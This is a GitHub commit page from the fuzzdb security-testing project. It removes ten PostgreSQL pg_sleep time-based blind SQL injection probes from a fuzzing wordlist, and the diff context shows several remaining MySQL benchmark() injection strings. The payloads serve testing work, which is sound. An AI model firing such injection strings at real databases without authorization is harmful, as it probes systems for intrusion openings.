Skip to content

Commit

Permalink
Removed PGSQL per Issue fuzzdb-project#2
Browse files Browse the repository at this point in the history
I confirmed that the pg_sleep returned a null and caused a non-exploitable error, so I deleted the commands that referenced it.
  • Loading branch information
sempf committed Oct 3, 2017
1 parent ecb0850 commit 67fd2f1
Showing 1 changed file with 0 additions and 10 deletions.
10 changes: 0 additions & 10 deletions attack/sql-injection/detect/GenericBlind.txt
Original file line number Diff line number Diff line change
Expand Up @@ -29,13 +29,3 @@ benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(__TIME__)--
1 or pg_sleep(__TIME__)--
" or pg_sleep(__TIME__)--
' or pg_sleep(__TIME__)--
1) or pg_sleep(__TIME__)--
") or pg_sleep(__TIME__)--
') or pg_sleep(__TIME__)--
1)) or pg_sleep(__TIME__)--
")) or pg_sleep(__TIME__)--
')) or pg_sleep(__TIME__)--

0 comments on commit 67fd2f1

Please sign in to comment.